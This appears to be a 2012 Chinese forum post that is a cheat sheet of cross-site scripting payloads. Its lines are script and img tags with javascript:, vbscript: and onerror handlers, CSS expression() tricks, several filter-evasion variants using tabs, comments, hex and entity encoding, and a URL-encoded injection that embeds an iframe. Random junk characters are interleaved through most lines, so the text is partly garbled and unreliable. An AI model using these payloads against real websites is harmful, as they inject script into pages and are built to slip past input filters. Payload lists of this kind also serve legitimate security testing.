<script>alert("跨站")</script> (最常用)
; U; R- n: l& Z- ~& m ~<img scr=javascript:alert("跨站")></img>; v# t1 W% R" u" f6 I" L/ B
<img scr="javascript: alert(/跨站/)></img>1 {* J) B% S1 F% b
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
3 c! u4 W& U, \( l, Z( ]! O<img scr="#" onerror=alert(/跨站/)></img>
! ^/ a7 ?: _ q8 g6 u. L<img scr="#" style="xss:expression(alert(/xss/));"></img>
4 U2 G8 [4 @. j( S<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
* i, v6 Y0 q9 A7 P9 N5 k<img src=vbscript:msgbox ("xss")></img>
- w/ y' S( c3 ~2 L! E' `<style> input {left:expression (alert('xss'))}</style>
% A2 u# ] c* g( [* o |: F<div style={left:expression (alert('xss'))}></div>; a. K+ `% N% r/ E. m
<div style={left:exp/* */ression (alert('xss'))}></div>
# \( D1 ?& v& H* I! }<div style={left:\0065\0078ression (alert('xss'))}></div>
2 n. y% e2 W" shtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
s: s) j: y7 d5 E. W! u! @7 dunicode <div style="{left:expRessioN (alert('xss'))}">+ h. @! G4 q! q J! ?0 ]. t( [
( ]1 f6 c+ K( `! j1 [4 f
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["# A' L/ x1 T h: k
|
发表于 2012-9-13 17:15:04
收藏
支持
反对